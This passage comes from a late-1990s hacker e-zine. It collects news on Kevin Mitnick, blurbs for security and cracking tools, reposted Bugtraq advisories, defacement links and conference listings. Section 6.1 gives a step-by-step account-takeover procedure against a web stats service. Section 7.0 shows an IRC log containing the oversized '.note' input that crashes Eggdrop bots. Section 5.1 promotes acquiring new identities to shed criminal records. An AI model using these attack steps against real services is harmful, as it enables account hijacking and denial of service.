  694.       http://www.sinnerz.org/fh (Fucking Hostile's kill-kevin campaign)
  695.  
  696.      For information on Kevin Mitnick's current status:
  697.       (Mitnick's trial has now been delayed until April 20, 1999 by HIS
  698.        request see article following ...)
  699.  
  700.       http://www.kevinmitnick.com/home.html
  701.  
  702.      Books:
  703.  
  704.           The Fugitve Game - Johnathan Littman
  705.           TAKEDOWN - John Markoff and Tsutomu Shimomura
  706.  
  707.     [ Read and learn ]
  708.     
  709.  
  710.     @HWA
  711.     
  712.  
  713.  
  714. 4.3 Mitnick Speaks
  715.     ~~~~~~~~~~~~~~
  716.     Source: Wired News
  717.  
  718.     Mitnick: 'I Am Tired of Delays'
  719.     by Douglas Thomas
  720.  
  721.     2:09 p.m.  7.Dec.98.PST
  722.     LOS ANGELES -- Alleged computer cracker Kevin Mitnick said a three-month
  723.     delay in the start of his trial will still not give his defense adequate
  724.     time to review the government's case against him.
  725.  
  726.     Full story:
  727.     http://www.wired.com/news/news/politics/story/16684.html
  728.     
  729.     
  730.     @HWA
  731.  
  732.  
  733. 4.4 Sinnerz and the Genius
  734.     ~~~~~~~~~~~~~~~~~~~~~~
  735.  
  736.     This sounds pretty damn kewl, but be careful checking it out ;-)
  737.  
  738.     Features of GENIUS.EXE (NOTE: I haven't played with this yet ...)
  739.  
  740.     From the sinnerz site:
  741.  
  742.     o Comsumes only 2% of system resources
  743.     o Multi-threaded - no hangs!
  744.     o Unobtrusive tray application - saves screen real estate
  745.     o Copy your local IP, hostname, or an ASCII character to the Windows clipboard
  746.     o Clipboard viewer
  747.     o Finger client
  748.     o FTP client
  749.     o Raw HTTP Browser
  750.     o Ping
  751.     o Trace Route
  752.     o SMTP client
  753.     o Telnet client with VT100 emulation
  754.     o NTP (Network Time Protocol) client
  755.     o Whois client
  756.     o Current Connections - lists all connections to and from your computer
  757.     o Download Manager - download a list of HTTP files
  758.     o Name Scanner - resolve a block of IPs
  759.     o NSLookup - convert IPs to Hostnames or visa versa
  760.     o Patience - clean the spam out of your email account
  761.     o Port Info - look up a port number in a database
  762.     o Service Scanner - check the daemon name/version on different ports of an IP block
  763.     o Site Checker - check to see if your favorite sites have been updated
  764.     o Address Book - maintain a detailed list of contact
  765.     o Notes - keep multiple notes handy (good for book/music/movie lists)
  766.     o Passwords - keep all of your passwords in one secure place
  767.     o To Do List - keep track of all the things you need to do
  768.     o Clear the Start Menu | Documents list
  769.     o Clean out the Windows temporary directory
  770.     o Conversions - convert one unit to another
  771.     o Grep - search the files on your hard drive
  772.     o Password Generator - create strong, random passwords
  773.     o UUEncode - encodes/decodes .uue files
  774.     o Check Mail - tell you how many messages are in your mailbox
  775.     o Finger Server
  776.     o IdentD Server
  777.     o Portscan Detection - alerts you if someone is portscanning you
  778.     o Port Watcher - keeps track of all connections for up to 5 different ports
  779.     o Stay Alive - keeps your ISP from dropping your connection
  780.     o Extensive help file
  781.     o User-defined global hot keys - hit Ctrl+Shift+M to check your mail!
  782.     o Plus an incredible interface!
  783.  
  784.     Get it here http://www.sinnerz.com/genius/
  785.     
  786.     @HWA
  787.  
  788.  
  789. 4.5 More Cash Cows and k00l t00lz
  790.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  791.  
  792.     http://www.born2hack.com/html/news.html
  793.  
  794.     - Reason why exactly you should get a born2hack.com CD
  795.     [born2hack.com CD's will not be given out to everyone, they are
  796.     reserved for a *higher* level user]
  797.  
  798.     mailto:email@born2hack.com
  799.  
  800.     The fee which you would pay if you are accepted is 25 USD.
  801.  
  802.     "- how to communicate with a remote machine the same style than `acid
  803.     burn' did with `zero cool/crash override' when he was hacking MTV in
  804.     the movie hackers."
  805.  
  806.     "Reason why exactly you should get a born2hack.com forwarding
  807.     address [born2hack.com addresses will not be given out to everyone,
  808.     they are reserved for a *higher* level user]"
  809.  
  810.     mailto:cd@born2hack.com
  811.  
  812.     The fee which you would pay if you are accepted is 20 USD/3 months.
  813.  
  814.     Yeah, ok.
  815.        
  816.        
  817.     @HWA
  818.     
  819.  
  820. 4.6 SAFER - Security Alert For Enterprise Resources by SIAM RELAY
  821.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  822.     SAFER is a security newsletter published by the folks at Siam Relay
  823.     and outlines current threats and countermeasures for the sysadmin.
  824.  
  825.     Source: http://www.siamrelay.com/safer/
  826.     From safer#6: (SAFER#7 now out)
  827.  
  828.     UNDERGROUND TOOLS
  829.  
  830.     Here are the new tools that hackers/crackers will soon use against
  831.     your systems. We do not recommend that you use such tools against any
  832.     resources without prior authorization. We only list new tools published
  833.     since the last issue of SAFER.
  834.  
  835.     mountdscan.c
  836.      - Scanner that looks for server vulnerable to rpc.mountd security hole.
  837.     rpc.ttdbserver.c
  838.      - remote buffer overflow exploit for Solaris, IRIX and HP-UX.
  839.     brkill.c
  840.      - Allows you to reset TCP/IP connection on Windows 95/NT computers.
  841.     rockme.c
  842.      - MS Outlook DoS attack by using long subject line.
  843.     wipe-1.00.tgz
  844.      - UTMP/WTMP log cleaner.
  845.     ftpcheck.pl
  846.      - Scans subnets for anonymous ftp servers.
  847.     relaycheck.pl
  848.      - Scans subnets for SMTP servers that allows relaying (read: spamming).
  849.      
  850.     @HWA
  851.  
  852.  
  853. 5.0 Trinux a micro-linux distribution and security tool
  854.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  855.  
  856.     From the website: http://www.trinux.org/
  857.  
  858.      "Trinux is a portable Linux distribution that boots from 2-3
  859.       floppies (or a FAT 16 partition) and runs entirely in RAM.
  860.       Trinux contains the latest versions of popular network
  861.       security tools and is useful for mapping and monitoring
  862.       TCP/IP networks.
  863.  
  864.       Trinux transforms an ordinary x86 PC into a powerful
  865.       network [security] management workstation without
  866.       modifying the underlying hardware or operating system.
  867.       The default configuration uses a stripped down version
  868.       of kernel 2.0.35 that should boot on any 386 or better
  869.       with at least 12-16 megabytes of RAM. Hardware
  870.       support for NICs is provided through kernel modules
  871.       which may be downloaded and copied to the boot medium"
  872.       
  873.       
  874.     @HWA
  875.  
  876.  
  877. 5.1  Getting a new identity.
  878.      ~~~~~~~~~~~~~~~~~~~~~~~
  879.  
  880.      Reference: http://offshoreprofit.nu/identity/index.html
  881.  
  882.      There are some very good reasons (other than the obvious) for seeking
  883.     out and aquiring a new identity. These include messy divorces, criminal
  884.     records and tax problems, you don't want all that bad history following
  885.     you around wherever you go now do you?. In the U.S.A all bank transactions
  886.     are recorded and available for scrutiny by firms or private investigators
  887.     etc..
  888.  
  889.      "Did you know that if you transfer amounts of over $10,000 (often
  890.       already if you transfer amounts over $3,000), your friendly banker
  891.       will report you to a semi-secret government agency called FinCEN
  892.       for possible money laundering investigations?"
  893.  
  894.      Surprised? you shouldn't be, the US and Canada are more communist than
  895.     Russia ever was in many ways, only difference here is that you're given
  896.     a cleverly sugared illusion of freedom, ask someone from the ex-USSR or
  897.     Serbia, Croatia, Macedonia etc ... they've lived under communist rule
  898.     for years.
  899.     
  900.     @HWA
  901.  
  902.      
  903. 5.2  Credit Card Phraud
  904.      ~~~~~~~~~~~~~~~~~~
  905.  
  906.     Source: Published Sunday, December 6, 1998, in the San Jose Mercury News
  907.  
  908.     CARD RISK
  909.  
  910.     There are many real threats to consumers' credit cards, but few are
  911.     unique to the Internet. Most crimes involve poor security by a merchant
  912.     or scams in which consumers give their number to a stranger. And
  913.     credit card users face these risks regardless of where they use their
  914.     card.
  915.  
  916.     April 1995: Hackers began disrupting service at America Online using
  917.     a widely disseminated program called AOHell. Some posed as AOL
  918.     employees to hoodwink customers into divulging their credit card
  919.     numbers. AOL defeated the program and began spreading the
  920.     following warning: ``Reminder: AOL staff will never ask for your
  921.     password or billing information.''
  922.  
  923.     September 1995: Federal authorities accused two Berkeley hackers
  924.     of breaking into a computer system for Tower Video stores and
  925.     stealing about 2,000 credit card numbers. While the alleged crime
  926.     occurred online, Tower collected the numbers in normal retail
  927.     transactions.
  928.  
  929.     November 1996: Someone stole a laptop computer from the Foster
  930.     City offices of Visa International containing information on about
  931.     314,000 Visa, MasterCard, American Express, Discover and Diner's
  932.     Club accounts. The criminal was apparently interested in the computer
  933.     and never used any of the cards, a Visa spokesman said.
  934.  
  935.     April 1997: A computer containing financial information for 3,000
  936.     CalTrain customers was stolen from a Santa Clara depot. It contained
  937.     financial data on 2,500 customers who bought their tickets with checks
  938.     and 500 who charged their tickets to their credit cards.
  939.  
  940.     May 1997: The FBI arrested a man trying to sell 100,000 credit card
  941.     numbers stolen from the computers of a San Diego Internet service
  942.     provider. Any credit card database that's connected to a
  943.     communications network -- as virtually all are -- faces similar risk.
  944.  
  945.     November 1997: Four teenagers hacked into an Internet service
  946.     provider and gained access to the records of an unidentified Internet
  947.     auction house, where they obtained credit card numbers they later used
  948.     to buy computer equipment.
  949.  
  950.     Source: Mercury News reporting
  951.     
  952.      @HWA
  953.  
  954. 6.0  Packet Storm Security is in trouble!
  955.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  956.  
  957.    Yet another fantastic site may fall due to POPULARITY, yeah you read
  958.    that right, tattooman's site (aka Ken Williams) is currently running
  959.    on the genocide2600 servers, the following is quoted directly from
  960.    the site:
  961.  
  962.    "IMPORTANT NOTICE: Packet Storm Security's Web Site is in financial
  963.     trouble! Due to the increasing popularity of this web site, we are now
  964.     averaging over 80,000 hits/day, and double that figure on some days. We
  965.     have been doing over 4 GB/day in transfers, with all of the numbers going
  966.     up every week. This web site has recently grown to over 1.2GB, and is
  967.     getting larger every day. Our current contracts for webhosting and
  968.     Internet connectivity expire on 12/31/98. We have been advised that our
  969.     service rates will increase by at least 300% for the first quarter of 1999.
  970.     After shopping around, we have been quoted figures of $1500-8000/month to
  971.     host this web site by other companies and service providers. Since this
  972.     site is free (on principle), and we do not offer advertising (on principle),
  973.     we pay for it ourselves. The problem we now face is that we cannot afford
  974.     such steep increases. If you have any viable solutions or suggestions, then
  975.     please contact us ASAP. Email us at packetstorm@genocide2600.com, or for
  976.     secure encrypted communications, use our PGP keys and
  977.     mail us atjkwilli2@unity.ncsu.edu. "
  978.     
  979.      @HWA
  980.  
  981. 6.1  Latest exploits and hacks
  982.      ~~~~~~~~~~~~~~~~~~~~~~~~~
  983.  
  984.      Source credit:-> BUGTRAQ
  985.  
  986.      Approved-By: aleph1@DFW.NET
  987.      Date:     Sat, 21 Nov 1998 12:54:41 -0500
  988.      Reply-To: John Carlton <techhelp@ROCKETMAIL.COM>
  989.      Sender: Bugtraq List <BUGTRAQ@netspace.org>
  990.      From: John Carlton <techhelp@ROCKETMAIL.COM>
  991.      Subject:      Freestats.com CGI vulnerability
  992.      To: BUGTRAQ@netspace.org
  993.  
  994.      About a year ago I developed an exploit for the free web stats services
  995.      offered at freestats.com, and supplied the webmaster with proper code to
  996.      patch the bug.  After hearing no reply, and seeing no fix in sight, I've
  997.      decided to post it here.
  998.  
  999.      Procedure:
  1000.  
  1001.      Start an account with freestats.com, and log in.  Click on the area that
  1002.      says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER INFO"  This will call
  1003.      up a file called edit.pl with your user # and password included in it.
  1004.     
  1005.      Save this file to your hard disk and open it with notepad.  The only form
  1006.      of security in this is a hidden attribute on the form element of your account
  1007.      number.  Change this from *input type=hidden name=account value=your#* to
  1008.      *input type=text name=account value=""*  Save your page and load it into your
  1009.      browser.
  1010.  
  1011.      Their will now be a text input box where the hidden element was before.
  1012.      Simply type a # in and push the "click here to update user profile" and all
  1013.      the information that appears on your screen has now been written to that user
  1014.      profile.
  1015.  
  1016.      But that isn't the worst of it.  By using frames (2 frames, one to hold this
  1017.      page you just made, and one as a target for the form submission) you could
  1018.      change the password on all of their accounts with a simple JavaScript function.
  1019.  
  1020.      Any thoughts, questions, or comments?
  1021.  
  1022.      John Carlton,
  1023.      CompSec specialist.
  1024.  
  1025.      Source credit:-> [ http://www.rootshell.com/ ]
  1026.  
  1027.     Date:         Thu, 5 Nov 1998 02:38:51 +0200
  1028.     From:         Tatu Ylonen <ylo@SSH.FI>
  1029.     Organization: SSH Communications Security, Finland
  1030.     Subject:      security patch for ssh-1.2.26 kerberos code
  1031.  
  1032.     -----BEGIN PGP SIGNED MESSAGE-----
  1033.  
  1034.     This message contains information relevant to people who compile ssh
  1035.     with --with-kerberos5.  There is one or more potential security
  1036.     problem in the Kerberos code.  These issues are not relevant for
  1037.     people who have not explicitly specified --with-kerberos5 on the
  1038.     configure command line.
  1039.  
  1040.     Peter Benie <pjb1008@cam.ac.uk> found a buffer overflow in the
  1041.     kerberos authentication code.  To quote from his mail:
  1042.  
  1043.     > What about sshconnect.c, line 1139
  1044.     >
  1045.     >     sprintf(server_name,"host/%s@", remotehost);
  1046.     >
  1047.     > where remotehost is (char *) get_canonical_hostname() (up to 255 chars),
  1048.     > is copied into server_name (a 128 char buffer)?
  1049.  
  1050.     It looks to me like this is a genuine buffer overflow.  I had not
  1051.     noticed it when going through the code.
  1052.  
  1053.     This buffer overflow is, however, extremely hard to exploit:
  1054.  
  1055.     1. The victim must have have client compiled with --with-kerberos5 and
  1056.        --enable-kerberos-tgt-passing.
  1057.     2. The victim must be connecting to a server running with the same
  1058.        options (i.e., krb5 with tgt passing).
  1059.     3. You must do the following DNS spoofing:
  1060.        - fake reverse map for the *server*
  1061.        - fake forward map for the fake reversed name
  1062.     4. You must fake your attack code to look like valid DNS records; this
  1063.        is highly untrivial with modern versions of bind that reject all
  1064.        domain names with invalid characters in them.
  1065.     5. Only the part of the DNS name beyond 128 bytes can be exploited; that
  1066.        must be made to align with stack frames and must contain appropriate
  1067.        return addresses and jump addresses.  It has been shown that this can
  1068.        generally be done, but the space and structural constraints here are
  1069.        extremely tight compared to most instances of buffer overflow
  1070.        exploits.
  1071.     6. Since the client with Kerberos TGT passing is only used
  1072.        interactively, the user will almost certainly notice that something
  1073.        went wrong.  I don't think you can, within the structure and space
  1074.        constraints, construct the code so that the user would not notice at
  1075.        least the client crashing.
  1076.     7. You cannot try again after a failed attack until the client again
  1077.        tries to log into the same host.
  1078.  
  1079.     This might yield an attack against the *client*.
  1080.  
  1081.     I've fixed this in the source tree.
  1082.  
  1083.     I'd like to thank Peter for reporting this.  A fix will be included in
  1084.     the next release (which I expect in about a week).
  1085.  
  1086.     <patch deleted for brevity>
  1087.  
  1088.     - --
  1089.     SSH Communications Security           http://www.ssh.fi/
  1090.     SSH IPSEC Toolkit                     http://www.ipsec.com/
  1091.     Free Unix SSH                         http://www.ssh.fi/sshprotocols2/
  1092.  
  1093.     -----BEGIN PGP SIGNATURE-----
  1094.     Version: 2.6.3i
  1095.     Charset: noconv
  1096.  
  1097.     iQCVAwUBNkDyOakZxfGWH0o1AQGYOQP/bUNnE/ZpSQqWVc0ngxLG50+CtyksugLJ
  1098.     wD0X2yIoc8jmY+UNPL7weQatgv6CmUUoWWpLctzKr8A6G/HrD2sh0OHPBwhIxg1i
  1099.     3mPj7WrcIX9g/K5LaEksiZ0vv4h/gvSJty5y+wRiu0QLRmuAy91CyaKTV7Sab0YT
  1100.     /W/s1NazNIg=
  1101.     =iABB
  1102.     -----END PGP SIGNATURE-----
  1103.   
  1104.     
  1105.      @HWA
  1106.  
  1107. 6.2  cDc releases new ButtSniffer
  1108.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1109.  
  1110.      Blurb from the cDc website:
  1111.  
  1112.      http://www.cultdeadcow.com/~dildog/BUTTSniffer/
  1113.  
  1114.      BUTTSniffer Prerelease 0.9.3 Public Beta Release
  1115.  
  1116.      Description:
  1117.  
  1118.      BUTTSniffer is a packet sniffer and network monitor for Win95, Win98
  1119.      and also Windows NT 4.0. It works as a standalone executable, and as
  1120.      plugin for Back Orifice. Want to know what's really going on on your
  1121.      network segment? You need BUTTSniffer.
  1122.  
  1123.      It features the following:
  1124.  
  1125.      o TCP Connection monitoring. Full and split screen. Text and Hexadecimal
  1126.        views.
  1127.  
  1128.      o Password sniffing. Full phrasecatcher built in. Currently supports HTTP
  1129.        basic authentication, FTP, Telnet, POP2 and POP3.
  1130.  
  1131.      o Support pending for IMAP2, RLogin, and possibly other protocols Packet
  1132.        filtering. Firewall style filtering lists. Exclude/include ranges of IP
  1133.        addresses and ports.
  1134.  
  1135.      o Multiple interface support. Can be started on any of the system's network
  1136.        interfaces. Multiple instances of BUTTSniffer can be run at the same time.
  1137.  
  1138.      o Interactive mode. Spawns a port that you can telnet to, and displays an
  1139.        easy to use vt100 menu based user interface for remote sniffer access.
  1140.  
  1141.      o War mode. War mode features include connection resetting. More features
  1142.        to come!
  1143.  
  1144.      o Win95, Win98, and Windows NT operating system support. Use it both at home
  1145.        and at work!
  1146.  
  1147.      <sic>
  1148.      
  1149.      
  1150.      @HWA
  1151.      
  1152.  
  1153. 6.3  BOFREEZE - Been orificed? freeze those buggers!
  1154.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1155.  
  1156.      If you have been bitten by BO theres a damn good chance you deserved it
  1157.      but in case you're a hapless victim BOFreeze will bite people on the ass
  1158.      that are running (or trying to run) BO on your system.
  1159.  
  1160.      From the site:
  1161.  
  1162.      "BO FREEZE is a program which listens on UDP port 31337 (or a port of
  1163.      your choice - port 31337 since this is the default listening port for a
  1164.      BO server) for BO client packets, all of which are encrypted with a 16
  1165.      bit encryption key.  Each client packet, when it has been decrypted,
  1166.      starts with this string:  *!*QWTY?
  1167.  
  1168.      BO FREEZE can recognise not just one encrypted BO packet, not even 10 or
  1169.      100 - not even 1000 - but ALL 65536 (that's 216) different possible
  1170.      encrypted BO client packets!!!  This means that regardless of what pass
  1171.      word is used at the BO client end, BO FREEZE can still recognise a BO
  1172.      packet when it sees one!  So what is the point of all this?  And why is
  1173.      the program called BOFREEZE?
  1174.  
  1175.      Quiet simply, cDc (Cult of the Dead Cow - the hacking organisation who
  1176.      created BO) did not write very good code in their BO GUI (and command
  1177.      driven) BO client.  As a result, WZC Productions has found that sending
  1178.      malformed data packets back to the client using the correct encryption
  1179.      key causes major problems for the BO client user.  With the command
  1180.      driven client, strange and fabulous characters appear on the screen
  1181.      (effectively disabling the client completely because its packet buffer
  1182.      becomes full) and with the GUI client - that just freezes up
  1183.      completely!!!
  1184.  
  1185.      The point is this.  All that is needed is 1 person in 254 on the net to
  1186.      be running BO FREEZE (liken this to your computer being the "bad apple"
  1187.      in a bag of apples) and it will cause major problems for people who
  1188.      perform ping sweeps, trying to track down computer systems with BO
  1189.      installed on them!
  1190.  
  1191.      BOFreeze page: http://members.xoom.com/wzc/bof/main.html
  1192.      
  1193.  
  1194.     @HWA
  1195.     
  1196.  
  1197.  
  1198. 7.0 HackingIRC'98 (Part 1) -- WARNING! Patch your eggdrops!
  1199.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1200.  
  1201.     * This is an excerpt from the HackingIRC'98 textfile by Cruciphux
  1202.  
  1203.     Prologue
  1204.     ~~~~~~~~
  1205.  
  1206.      IRC is a joke yes we all know that, BUT for some insane reason people
  1207.     still tend to take it so serious, thats why we have ppl taking down entire
  1208.     networks with smurf attacks coz joecool operator or mr'leet was nasty to
  1209.     us .. anyways to add more mayhem or perhaps help clear some of it up I
  1210.     wrote this text since most others are so out of date its not funny...
  1211.  
  1212.     Crashing Eggdrop Bots
  1213.     ~~~~~~~~~~~~~~~~~~~~~
  1214.  
  1215.     The following will crash eggdrop bots: (Tested on version v1.3.8) probably
  1216.     works on 1.3.x I believe this one requires that TCL be *enabled*.
  1217.  
  1218.     You MUST have access to the bot (regardless of level) in order for most
  1219.     of the current known overflows to work. These will merely cause the egg
  1220.     to die with a segfault error.
  1221.  
  1222.    *** sk00bi (sk@some.leethost.org) has joined channel #leetchan
  1223.    *** You are now talking to channel #leetchan
  1224.    >/t
  1225.    332 Topic for #leetchan: ---=[ We're so fucking leet its not funny. ]=---
  1226.    333 The topic was set by GoatBoi 48413 sec ago
  1227.    > w00p
  1228.    > awpz
  1229.    *** Mode change "+o sk00bi" on channel #leetchan by KKl0wn
  1230.    <KKl0wn> whatup?
  1231.    *kkl0wn*> gimme bot axs? I have a mad sploit to upload ...
  1232.    *KKl0wn* k. hang a sec ...
  1233.    > k
  1234.    *KKl0wn* pass is freekevin
  1235.    > ha
  1236.    <KKl0wn> ;)
  1237.    *** Sent DCC CHAT request to leetb0t
  1238.    *** DCC chat connection to leetb0t[129.x.x.x:xxxx] established
  1239.    =leetb0t= Enter your password.
  1240.    => =leetb0t= hax0r98
  1241.    =leetb0t= Negative on that, Houston.
  1242.    *** DCC CHAT connection to leetb0t lost [Remote End Closed Connection]
  1243.    *** Sent DCC CHAT request to leetb0t
  1244.    *** DCC chat connection to leetb0t[129.x.x.x:xxxx] established
  1245.    =leetb0t= Enter your password.
  1246.    => =leetb0t= freekevin
  1247.    =leetb0t= Connected to leetb0t, running Eggdrop v1.3.8  (c)1997 Robey Pointer
  1248.    =leetb0t=     ____                __
  1249.    =leetb0t=    / __/___ _ ___ _ ___/ /____ ___   ___
  1250.    =leetb0t=   / _/ / _ `// _ `// _  // __// _ \ / _ \
  1251.    =leetb0t=  /___/ \_, / \_, / \_,_//_/   \___// .__/
  1252.    =leetb0t=       /___/ /___/                 /_/
  1253.    =leetb0t=            ___    ____
  1254.    =leetb0t=           <  /   |_  /
  1255.    =leetb0t=           / /_  _/_ <
  1256.    =leetb0t=          /_/(_)/____/ (c) Robey Pointer 1997
  1257.    =leetb0t=
  1258.    =leetb0t= Hey sk00bi! My name is leetb0t and I am running eggdrop v1.3.8, on FreeBSD 3.0-980520-SNAP.
  1259.    =leetb0t= Local time is now ^B05:31^B
  1260.    =leetb0t= Commands start with '.' (like '.quit' or '.help')
  1261.    =leetb0t= Everything else goes out to the party line.
  1262.    =leetb0t= You have no messages.
  1263.    =leetb0t= *** sk00bi joined the party line.
  1264.    => =leetb0t= .who
  1265.    =leetb0t= [05:31] #sk00bi# who
  1266.    =leetb0t= Party line members:  (* = owner, + = master, @ = op)
  1267.    =leetb0t=   +sk00bi sk@some.leethost.org (con:mkcobxs)
  1268.    => =leetb0t= gr0nk
  1269.    =leetb0t= <sk00bi> gr0nk
  1270.    => =leetb0t= this b0t is h1st0ry
  1271.    =leetb0t= <sk00bi> this b0t is h1st0ry
  1272.    =leetb0t=.note aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1273.    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1274.    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1275.    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1276.    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@dummy
  1277.    =leetb0t= [08:22] * Last context: tclhash.c/509
  1278.    =leetb0t= [08:22] * Wrote DEBUG
  1279.    =leetb0t= [08:22] * SEGMENT VIOLATION -- CRASHING!
  1280.    *** DCC CHAT connection to leetb0t lost [Remote End Closed Connection]
  1281.    *** Signoff: leetb0t (EOF From client)
  1282.    <KKl0wn> pfft.
  1283.    > nice huh?
  1284.    <KKl0wn> yeah goody.
  1285.    > might wanna fix that ...
  1286.    >/quit patch yer bots!
  1287.    End session 08:23
  1288.  
  1289.  
  1290.    There are other buffer overrun conditions in current eggdrops but no,
  1291.    I'm not going to release them here.(yet...)
  1292.    
  1293.     @HWA
  1294.     
  1295.  
  1296. 7.1  Hacked Web Sites: The latest 'fun thing to do?'
  1297.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1298.      You know, I have a problem with the current trend of hacking websites
  1299.     and pages, especially when the perps do not leave a backup of the
  1300.     original site intact. It seems that in order for some to 'prove'
  1301.     themselves they need to hack a page and greet all their friends, their
  1302.     dog and their bum buddies.
  1303.  
  1304.      At one time it actually meant something, sites were hacked to purvey a
  1305.     message of socio-political or purely political importance, sites were
  1306.     hacked to prove major security flaws existed that were being denied by
  1307.     security "experts" or product pushers, nowadays its no more significant
  1308.     than spray paint on a wall. Having said all that I still believe the
  1309.     socio-political 'righteous' hacks have a place, but if you're a newbie
  1310.     looking for fame, word up, you'll just end up in the flamers hall of
  1311.     lame, the net never forgets. - Ed
  1312.  
  1313.  
  1314.     "You think its anarchy when you trash our halls?, trash a bank
  1315.     if you've got real balls" - The Dead Kennedy's
  1316.  
  1317.  
  1318.     Some bullshit site hacks:
  1319.     ~~~~~~~~~~~~~~~~~~~~~~~~
  1320.  
  1321.     ie: Try searching for 'this site has been hacked' on webcrawler ;-)
  1322.  
  1323.     http://www.angelfire.com/ma/usmarine/index.html
  1324.     <Rest of list deleted - no fame for the lame>
  1325.  
  1326.     Its cool to bite the hand that feeds you?
  1327.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1328.  
  1329.     http://www.rootshell.com/
  1330.     http://www.hack-net.com/
  1331.  
  1332.     http://www.cyberarmy.com/  Dec 9th
  1333.     Mirror of hack:
  1334.     http://www.bikkel.com/~demoniz/hacksite/cyberarmy.html
  1335.  
  1336.  
  1337.     Hacks actually worth reporting that carry some meaning(?):
  1338.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1339.  
  1340.     Rotterdam Art Institute hacked
  1341.     http://www.bikkel.com/~demoniz/hacksite/hro_nl.html
  1342.  
  1343.     The Tianjin City Network of Information of Science & Technology
  1344.     http://www.bikkel.com/~demoniz/hacksite/china.htm
  1345.     Story:http://www.wired.com/news/news/politics/story/16545.html
  1346.  
  1347.     Packard Bell Computers
  1348.     http://www.sekurity.8m.com/haxxor.html
  1349.  
  1350.     There have been SO many websites hacked lately its almost useless
  1351.     and certainly boring following them all, if you want though I will
  1352.     chronicle them here, email me your opinion. Meanwhile these sites
  1353.     do a good job of archiving old and new hacked websites:
  1354.     (2600 even has a section for fake hacked sites .*shrug* ..)
  1355.  
  1356.     http://www.freespeech.org/resistance/index.htm (Good site)
  1357.     http://www.2600.com/hacked_pages/
  1358.     http://www.onething.com/archive/ ** Censored! (???)
  1359.  
  1360.  
  1361.     @HWA
  1362.     
  1363.    
  1364. 8.0  ROOTFEST'99
  1365.      ~~~~~~~~~~~
  1366.  
  1367.     RootFest will be May 21-23, 1999 in Minneapolis, MN
  1368.     http://www.rootfest.org/
  1369.  
  1370.     Speakers                      Topic
  1371.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1372.     Bruce Schneier .............. To be announced.
  1373.     Who are they?: Published author,  Counterpane president
  1374.     Steve Stakton (Optiklenz).... cisco pix firewall security analysis
  1375.     Who are they?: Legions Interactive founder
  1376.     Adam L. Beberg .............. v3 security(tentative)
  1377.     Who are they?: Distributed.net founder
  1378.     Konceptor ................... Monitoring IRC, evading capture ,
  1379.                                   Naval Surface Warfare Center
  1380.     Who are they?: U.S. Hacker
  1381.     Mike Roadancer .............. "Hacker - It's not a dirty word"
  1382.                                   Hackers in the workplace
  1383.     Who are they?: President, Hacker's Defense Foundation
  1384.     Brian Ristuccia.............. ideas on Internet censorship
  1385.     Who are they?: Bay Networks contractor
  1386.     Paul McNabb...................Trusted Operating Systems Technology
  1387.                                   in Web-based computing
  1388.     Who are they?: CTO of Argus Systems Group, Inc.
  1389.     Brenno J.S.A.A.F. de Winter ..Internet Security in Europe - State of Affairs
  1390.     Who are they?: Netherlands Hacker
  1391.     Data Shark....................TEMPEST and how to prevent it.
  1392.     Who are they?: System Administrator, hacker
  1393.     
  1394.     
  1395.     Please send corrections, or 'CON' announcements to hwa@press.usmc.net
  1396.     thanks.
  1397.  
  1398.     @HWA
  1399.     
  1400.  
  1401. 9.0  PHACVW, sekurity, security, cyberwar and referenced links
  1402.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1403.  
  1404.     Cool site of the month:
  1405.     ~~~~~~~~~~~~~~~~~~~~~~~
  1406.  
  1407.     Site....: PacketStorm Security
  1408.     Run by..: Ken Williams
  1409.     Alias...: tattooman
  1410.     URL.....: http://www.genocide2600.com/~tattooman/
  1411.     Comment.: More stuff than you can shake a stick at, and current.
  1412.     Rating..: ***** 5/5
  1413.     Reviewer: Ed.
  1414.  
  1415.     Honourable mentions:
  1416.     ~~~~~~~~~~~~~~~~~~~~
  1417.     HiR:Hackers Information Report... http://axon.jccc.net/hir/
  1418.     Backdoor and other trojans+ ..... http://www.ufl.edu/~cycy92n/des/zemacs/
  1419.  
  1420.  
  1421.     Top 10/50/100/1000 etc lists:
  1422.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1423.     http://www.webfringe.com/top100?
  1424.     http://www.hitbox.com/wc/world.100.HackingPhreaking.html
  1425.     http://www.tazzone.com/top500/tally.cgi?section1=Hacking_Phreaking
  1426.     http://www.splitinfinity.com/~top55/
  1427.     http://www.linkz.net/cgi-bin/top250/
  1428.  
  1429.     Misc:
  1430.     ~~~~
